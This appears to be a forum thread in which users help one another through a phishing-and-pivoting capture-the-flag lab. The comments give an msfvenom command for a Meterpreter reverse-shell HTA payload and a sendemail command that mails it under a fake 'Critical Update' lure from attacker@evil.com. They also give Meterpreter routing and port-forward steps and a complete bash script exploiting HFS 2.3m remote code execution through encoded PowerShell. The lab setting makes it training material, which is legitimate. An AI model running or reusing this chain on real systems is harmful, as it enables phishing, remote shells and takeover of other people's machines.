Got stuck at Task 2, i am not able to send any attachment with a suitable extension (.exe, .doc, etc) to the discovered email (i got an 554 error with sendemail). Any hints, please? Thank you!

It does not work because .exe and .doc payloads are automatically blocked.
You need to create a .hta payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f hta-psh -o shell.hta

Next you can send the email with the malicious attachment via sendmail:

sendemail -f attacker@evil.com -t techsupport@staff.fincorp.com -u “Critical Update” -m “Please review and install the attached urgent update.” -a shell.hta -s mail.server.local:25

If you can find flags 3 and 4 let me know something I never managed to finish it! D:

Thanks a lot!! I let you know if I go ahead with the next points.

I cannot complete flag 4 please someone help!

flag 3 i did this:
(but i cannot get flag 4 - i couldnt elevate my privileges from this point)

Add internal route

run autoroute -s 10.2.22.0/24
2) Port forward HFS to Kali

portfwd add -l 8888 -p 80 -r 10.2.22.193
Verify:

curl -I http://127.0.0.1:8888

Expect: Server: HFS 2.3m

3. Create HFS RCE script

cat > hfs_rce.sh << ‘EOF’
#!/usr/bin/env bash
banner() {
cat <<‘B’

/ \ \ / / | | \ / _ _ | || | |_ |__ / / /_ / _ __ \
| | \ \ / /| | ) | | | |) | || | ) | | | ’ \ () |) |
| | \ V / | |__ / /| |_| / /| _| / / ) | () _, / /
_| _/ || ||_/| |_| ||____/ _/ /_/____|

\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ |_ | |
\ \ / / _ \ '| | | | | | / ` | / | | | | |/ _ / | ’ \
\ V / / | | |_| | | || (| |/ /| || | | | / (| | | |
_/ _|| _, | |_,/|_, | ||_|_|| ||
|/ |__/
@VeryLazyTech - Medium
B
}
banner
set -e
commands=$(echo “echo [S]; $2; echo [S];” | iconv -t UTF-16LE | base64 -w 0)
payload=“/?n=%0A&cmd=cmd+/c+powershell±enc+$commands&search=%25xxx%25url%25:%password%\}\{.exec|\{.?cmd.\}|timeout=15|out=abc.\}\{.?n.\}\{.?n.\}RESULT:\{.?n.\}\{.^abc.\}====\{.?n.\}”
url=$1$payload
printf “[*] Sending payload…\n”
response=$(curl -s -X GET “$url”)
result=$(echo “$response” | awk ‘BEGIN {found=0} /[S]/ {if (found == 0) {found=1; next} else {exit}} found {print}’)
printf “[*] Output:\n%s\n” “$result”
EOF

chmod +x hfs_rce.sh
Test RCE:

./hfs_rce.sh http://127.0.0.1:8888 “whoami”

Mail sent successfully! Tried NC and MSF listener for 3 hours + still no connection, do I need to wait for office hours for someone to click? Thanks